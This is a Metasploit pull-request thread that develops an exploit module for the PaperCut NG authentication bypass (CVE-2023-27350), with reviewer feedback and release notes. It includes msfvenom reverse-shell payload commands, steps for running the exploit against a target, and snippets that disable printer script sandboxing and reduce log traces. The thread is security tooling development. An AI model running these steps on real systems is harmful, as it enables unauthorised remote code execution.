PaperCutNG Authentication Bypass with RCE
rapid7/metasploit-framework pull request #17936
Opened 2023-04-25 23:59 UTC by catatonicprime

This module has a couple of important settings. Namely JAR_FILE, which to be upfront and honest, I don't know how to make this "work right" - I thought I'd be able to generate payload .jar files on-the-fly, but that doesn't seem to be supported like using generate_exe in some other cases. Instead you need to bring your own, e.g. generate one with msfvenom as shown.

Another important setting is that of "NEVER_SET" (perhaps this needs to be renamed?) which is to never set a server configuration option if preferred. This is because the act of setting a configuration option is likely to generate a corresponding application log event. If, however, those settings are already present...

This module is capable, under certain circumstances, of obtaining code execution as SYSTEM without generating logging events or disk-based artifacts (I think... please help me check this).

## Verification

List the steps needed to make sure this thing work:

- [ ] Start `msfconsole`
- [ ] Generate a jar file with your preferred settings `ruby ./msfvenom -p java/meterpreter/reverse_tcp --format jar --encoder generic/none LHOST=192.168.1.3 LPORT=4444 -o /tmp/java_meterpreter_reverse_tcp.jar`
- [ ] `use exploit/multi/handler`
- [ ] `set PAYLOAD java/meterpreter/reverse_tcp`
- [ ] `set LHOST 192.168.1.3`
- [ ] `set ExitOnSession false`
- [ ] `run -j`
- [ ] `jobs`
- [ ] **Verify** java/meterpreter/reverse_tcp is running & waiting for connections
- [ ] `use exploit/multi/http/papercut_ng_auth_bypass`
- [ ] `set LHOST [ip]`
- [ ] `set SRVPORT 8000`
- [ ] `set JAR_FILE /tmp/java_meterpreter_reverse_tcp.jar`
- [ ] `set RHOSTS [target]`
- [ ] `check`
- [ ] **Verify** check reports "Appears Vulnerable"
- [ ] `run`
- [ ] **Verify** session is created

Video Demonstrating Success: https://youtu.be/KJnxSmozq6Q

For information from PaperCut see [Papercut's Disclosure](https://www.papercut.com/kb/Main/PO-1216-and-PO-1219)

Some of the write-ups & PoCs seem to have missed that there are actually two login bypasses (this is not made clear in the original disclosure). One is where you use the Login Button (described by [Horizon3.ai Writeup](https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise/)) This leads to a 'User "admin" logged into teh administration interface.' However, their analysis may have missed the BaseSetupPage class which also logs you in, automatically, as '[setup wizard]' (this is mentioned in the [Bleeping Computer Article](https://www.bleepingcomputer.com/news/security/hackers-actively-exploit-critical-rce-bug-in-papercut-servers/).

2023-04-26 00:13 UTC, h00die commented
This was next on my list, awesome that someone else got to it first!
I didn't look over your code, but I'd suggest either loading the page, or the Json API that tells you if scripts are enabled already. Then you can unset it later if need be so it's back to the original. I think most users will accept a log entry for a system shell, so no biggy on that

2023-04-26 00:26 UTC, h00die commented
I would also suggest adding the huntress, bleeping and horizon urls as references so it's easier to help. The huntress one may write to disk, but it also seems trivial. I'd suggest implementing that first, you can always add a second 'memory' target that does your current implementation

2023-04-26 00:42 UTC, catatonicprime commented
Turns out this does hit disk too... My procmon filters were too tight & I missed it. Took a broader approach and it fell right out in:
```C:\Program Files\PaperCut NG\server\tmp\jar_cache[timestamp].tmp```

In a way I opened the PR just to give me motivation to keep going... but this is already many hours in at this point because I have no idea what I'm doing. Ever.

Good idea with the JSON API thing... no idea how to do that, but neat idea.

2023-04-26 00:48 UTC, h00die commented
i'll see if i have time to take a look at this over the next week and give some suggestions. thanks for submitting it, even as it is, its good enough to get the ball rolling!

2023-04-26 01:20 UTC, h00die requested changes
Just a few comments on how you can clean this module up.  None of this will make it work, but it'll be easier to read.

I'd still suggestion going with the powershell method outlined in the papers/huntress video.  seems easier, but i'm also not a java person and im sure someone could get this current method to work, if one of those people is around, feel free to chime in :)

2023-04-26 01:20 UTC, h00die commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +          [ 'URL', 'https://www.papercut.com/kb/Main/PO-1216-and-PO-1219' ]
Add:
https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise/
https://www.bleepingcomputer.com/news/security/hackers-actively-exploit-critical-rce-bug-in-papercut-servers/
https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software

2023-04-26 01:20 UTC, h00die commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +  end
with our updated auth bypass code, this can be updated to:

```
bypass_success = bypass_auth
if bypass_success.nil?
  CheckCode::Safe('Unable to perform authentication bypass, server not vulnerable.')  
end
CheckCode::Vulnerable("Able to bypass authentication, JSESSIONID cookie: #{bypass_success}")
```

2023-04-26 01:20 UTC, h00die commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +        OptString.new('TARGETURI', [true, 'Path to the papercut application']),
```OptString.new('TARGETURI', [true, 'Path to the papercut application', '/']),```

2023-04-26 01:20 UTC, h00die commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +    if auth_bypassed == Exploit::CheckCode::Safe
this can be made less awkward now since we're not checking a check code

2023-04-26 01:20 UTC, h00die commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +    if auth_bypassed == Exploit::CheckCode::Safe
Also, if you add `prepend Msf::Exploit::Remote::AutoCheck` to this module, it'll do the auto check, so this `if` block can be removed in total.

2023-04-26 01:20 UTC, h00die commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +  def set_server_option(name, value)
I would recommend seeing about writing a `get_server_option(name)` function, so you can know what the values are ahead of time, and reset them if need be.

2023-04-26 01:20 UTC, h00die commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +    return Exploit::Failed unless html
you can change these to `fail_with` and it will be a little cleaner.  See https://github.com/rapid7/metasploit-framework/pull/17895/files#diff-d480e8c441f7904d984d61758f9ab4e9279b1d4eeb4c55827b02a5517099348fR90 as an example, but there are many.

2023-04-26 01:20 UTC, h00die commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +    success = set_server_option('print-and-device.script.enabled', 'Y')
as per previous `fail_with` comment, if you start using that it will kill execution within `set_server_options`.  Then the exploit function becomes a lot cleaner as you're not constantly checking results and such. this can all be simplified hopefully to:

```
script_enabled = get_server_option('print-and-device.script.enabled')
vprint_status("print-and-device.script.enabled currently set to: #{script_enabled}")
set_server_option('print-and-device.script.enabled', 'Y')
sandboxed= get_server_option('print.script.sandboxed')
vprint_status("print.script.sandboxed currently set to: #{sandboxed}")
set_server_option('print.script.sandboxed', 'N')

```

2023-04-26 01:20 UTC, h00die commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +        OptBool.new('NEVER_SET', [false, 'Never set server options to avoid unnecessary log events.'])
this can just be removed, if we have to reconfigure the system, it is what it is.

2023-04-26 01:20 UTC, h00die commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +          'SideEffects' => [IOC_IN_LOGS]
add `CONFIG_CHANGES`

2023-04-26 01:20 UTC, h00die commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +    if datastore['NEVER_SET']
If you want to keep this, you should check what the values of the 2 settings are, and if either isn't optimal, hit a `fail_with`

2023-04-26 01:20 UTC, h00die commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +    return Exploit::Failed unless html
https://docs.metasploit.com/docs/development/developing-modules/libraries/handling-module-failures-with-fail_with.html

2023-04-26 01:20 UTC, h00die commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +        'Privileged' => true,
```'Stance' => Msf::Exploit::Stance::Aggressive```

this makes the module the focus. when you add ::httpserver it sets it to passive by default, which is why it always goes to a background job.

2023-04-26 14:59 UTC, smcintyre-r7 commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +          LHOST=[lhost] LPORT=[lport] -o shell.jar
You should be able to handle this step yourself within the module and then remove the `JAR_FILE` datastore option.

You'd generate the payload using `#encoded_jar`. This will make it easier for the user to use the module since they don't have to take this next step and eliminate the possibility that the JAR file is invalid due to not being a JAR, being the wrong payload, etc.

2023-04-26 18:58 UTC, catatonicprime commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +  end
> I'd still suggestion going with the powershell method outlined in the papers/huntress video.

Regarding this, papercutNG is a cross platform system. While the Linux version of this is unlikely to grant a shell running with root, like its windows counter-part, I'm attempting to be more comprehensive.

What I can maybe do, and I'm looking into this, is determine the system type & modify the code injection mechanism to either by a callback for an exe or dll (like the huntress video) or java for linux. tbd.

2023-04-26 20:52 UTC, catatonicprime commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +          [ 'URL', 'https://www.papercut.com/kb/Main/PO-1216-and-PO-1219' ]
done in: https://github.com/rapid7/metasploit-framework/pull/17936/commits/22238a0860811dd54e808daad1c42f34b7a533d2

2023-04-26 20:56 UTC, catatonicprime commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +  end
I think the newer version of this, done here: https://github.com/rapid7/metasploit-framework/pull/17936/commits/9f6fe964e252b2317e00b471ab375f6b330bcba2

Is more inline with your sugesstion.

However, instead of returning the session cookie, I've opted to return the anti-csrf token. This token is required for future API calls & it is not *yet* in use (working on something now that may require it). Same effect, just a slightly different than proposed solution. Very good thought though, I like it a lot. Thanks.

2023-04-26 20:59 UTC, catatonicprime commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +        OptString.new('TARGETURI', [true, 'Path to the papercut application']),
I like it, but opt'd for /app (default configuration), done here: https://github.com/rapid7/metasploit-framework/pull/17936/commits/bcafd22997dd1feec99f89b9a7d67feefa08523e

2023-04-26 21:03 UTC, catatonicprime commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +    if auth_bypassed == Exploit::CheckCode::Safe
prepend check added here, https://github.com/rapid7/metasploit-framework/pull/17936/commits/5e93669d75e3dc2ba5b18b89e515c8836d66941e

I like it... but it leaves me with state machine questions.

2023-04-26 21:05 UTC, catatonicprime commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +  def set_server_option(name, value)
I didn't actually see this comment until after the changes, but I did split the functionality out into a get_config_option and set_config_option here: https://github.com/rapid7/metasploit-framework/pull/17936/commits/0be38eb3ab0d8e977095c416777e8e79c8ae6e55

It was something that was kind of already in it, but now it's definitely more clear (and likely to become even more clear as I iterate further).

2023-04-26 21:07 UTC, catatonicprime commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +          'SideEffects' => [IOC_IN_LOGS]
Done in: https://github.com/rapid7/metasploit-framework/pull/17936/commits/0cf5f4cacc8f0780230db9420ac8e94b7e768997

2023-04-26 21:07 UTC, catatonicprime commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +        'Privileged' => true,
done in: https://github.com/rapid7/metasploit-framework/pull/17936/commits/8c87660eaa329e7d2a8df7572e1d9c695970fe20

2023-04-26 23:14 UTC, catatonicprime commented
@h00die thanks for all the great feedback btw - it's been very helpful. I did mark one of the topics you shared as "resolved." I'm not actually an extensive github user, so when I saw it kind of disappear it made me pause on doing the same on other suggestions. Sorry for that.

2023-04-27 15:05 UTC, catatonicprime commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +    @origin = URI("#{protocol}://#{datastore['RHOST']}:#{datastore['RPORT']}") # required for anti-CSRF mechanisms
Perfect. I was thinking this was probably already a thing. Seems to work as expected, done.

Nice tip.

2023-05-05 16:32 UTC, cdelafuente-r7 reviewed
Thanks @catatonicprime for this module! I left a few comments and suggestions for you to review when you get a chance. Please, let me know if you have any questions.

2023-05-05 16:32 UTC, cdelafuente-r7 commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +    Timeout.timeout(datastore['HTTPDELAY']) { super }
The server will only be started when `super` is called. Same for `prime`, it will only be called when `super` is called. So this statement looks wrong to me. Would it be better to place it at the beginning of `exploit`?

Also, I'm not sure the request that setup the printer script should be placed in `primer`, since it requires to be authenticated. `primer` will be executed first and it is usually used to setup the local server before starting it.

2023-05-05 16:32 UTC, cdelafuente-r7 commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +  end
Did you try to use the `cmdstager` instead of setting up your own delivery server? It offers the possibility to use multiple payload types (droppers, in-memory, etc.). See the documentation [here](https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-command-stagers.html#the-msfexploitcmdstager-mixin) for more details.

2023-05-05 18:12 UTC, catatonicprime commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +    set_config_option('print.script.sandboxed', 'N')
I don't see why not. I'll look into it. Thanks

2023-05-05 18:13 UTC, catatonicprime commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +  end
Didn't know this was a thing. I'll have to look into it.

2023-05-11 05:17 UTC, catatonicprime commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +    set_config_option('print.script.sandboxed', 'N')
Turns out there's a couple of additional edge cases going back in time.

Namely, versions older than 19 do not require the changes in configuration for allowing scripting/sandboxing. I've captured these scenarios by parsing the version number form the SetupCompleted page & either opting to set them, or not, automatically. If the options are set, their original values are pushed into an area & then rolled back during cleanup per your suggestion.

Similarly there were a couple of additional edge cases identified. Namely Versions 16 and lower (at least to 14) require the removal of the '$Submit$1' in the call which triggers the code execution. The other scenario is that version 14 has a HTML element structure for reporting the active version number.

All in all though, the automatic undoing of changes to the configuration is now in there - so I'm going to mark this as resolved.

2023-05-11 05:55 UTC, catatonicprime commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +  end
I have a lot of complex emotions regarding this. They're unimportant. so I think it'll simply suffice to say...

I believe this is working pretty well at this point. Especially thanks to all the great feedback I've received so far. For this reason, any implementation of a `cmdstager` might need to be an exercise for the next person.

2023-05-11 16:10 UTC, catatonicprime commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +    Timeout.timeout(datastore['HTTPDELAY']) { super }
The order is correct.

The vulnerability is authentication bypass, not RCE. So even using `check` technically exploits this vulnerability, because it generates an authenticated session.

The printer script is placed in `primer` because it is the RCE trigger & the server needs to be up for it. But nothing else needs the server to be up, which is why `super` is called last.

2023-05-30 17:16 UTC, cdelafuente-r7 commented
Thanks @catatonicprime. I just left a few comments before it lands. Also, the Lint check is failing due to some issues reported by rubocop:
```
❯ rubocop modules/exploits/multi/http/papercut_ng_auth_bypass.rb
Inspecting 1 file
W

Offenses:

modules/exploits/multi/http/papercut_ng_auth_bypass.rb:214:5: C: [Correctable] Style/OrAssignment: Use the double pipe equals operator ||= instead.
    @csrf_token = bypass_auth unless @csrf_token
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
modules/exploits/multi/http/papercut_ng_auth_bypass.rb:245:3: W: Lint/SuppressedException: Do not suppress exceptions.
  rescue Timeout::Error
  ^^^^^^^^^^^^^^^^^^^^^

1 file inspected, 2 offenses detected, 1 offense autocorrectable
```

2023-05-31 08:45 UTC, cdelafuente-r7 commented
Oh I'm sorry, I forgot to publish these pending comments :). this should be good now.

2023-05-31 09:08 UTC, cdelafuente-r7 commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +# This module requires Metasploit: http://metasploit.com/download
This makes the linter fail:
```suggestion
# This module requires Metasploit: https://metasploit.com/download
```

2023-05-31 09:08 UTC, cdelafuente-r7 commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +          ['CVE', '2023–27350'],
This weird hyphen character also makes the linter fail:
```suggestion
          ['CVE', '2023-27350'],
```

2023-05-31 19:06 UTC, catatonicprime commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +    current_value = get_config_option(name)
Well now that I've looked at this for a couple of hours, trying desperately to be sure that I can do *something* to address this poor software design I've managed to get myself into. Wondering what should *really* be done about it. How to truly make it the greatest piece of software to have ever graced the planet.

But then I think to myself, maybe we just look at a scenario where those values don't exist (e.g. they've been removed) on systems where it matters (19+ iirc).

```
...
[*] Setting server option 'print-and-device.script.enabled' to 'Y') was ''
[*] Setting server option 'print.script.sandboxed' to 'N') was ''
... [ session created here ]
[*] Rolling back 'print.script.sandboxed' to ''
[+] Server option 'print.script.sandboxed' already set to '')
[*] Rolling back 'print-and-device.script.enabled' to ''
[+] Server option 'print-and-device.script.enabled' already set to '')
```

It works. Sure the sets actually fail, observable in how the rolling back during cleanup determines the values are already correctly set to '' - which isn't *quite* true. They're more like nil. But does it matter? The failed sets also don't generate any additional log events.

Conclusion:
If it ain't broke, don't fix it.

2023-05-31 19:18 UTC, catatonicprime commented on modules/exploits/multi/http/papercut_ng_auth_bypass.rb
> +    @csrf_token = bypass_auth unless @csrf_token
ah, yes, an unnecessary assignment. Removed.

2023-05-31 19:26 UTC, catatonicprime commented
> Oh I'm sorry, I forgot to publish these pending comments :). this should be good now.

I feel saner now. I thought I was just incapable of reading or comprehending. Which happens to me more often than I'd like. This was reassuring as a discovery.

I think I've addressed all the new feedback in one way or another.

2023-06-07 13:20 UTC, cdelafuente-r7 commented
Thanks @catatonicprime ! I just added the `Options` section that was missing in the documentation. Other than that, everything is looking good. I'll go ahead and land it. Thanks again for your contribution.

2023-06-07 13:20 UTC, merged

2023-06-07 13:36 UTC, cdelafuente-r7 commented
# Release Notes
This adds an exploit module that leverages an authentication bypass to get remote code execution on PaperCut NG version 8.0.0 to 19.2.7 (inclusive), version 20.0.0 to 20.1.6 (inclusive), version 21.0.0 to 21.2.10 (inclusive) and version 22.0.0 to 22.0.8 (inclusive). This vulnerability is identified as CVE-2023-27350. Due to an improper access control in the `SetupCompleted` class, it is possible to bypass authentication and abuse the built-in scripting functionality for printers to obtain code execution as the SYSTEM user on Windows and the less privileged `papercut` user on Linux.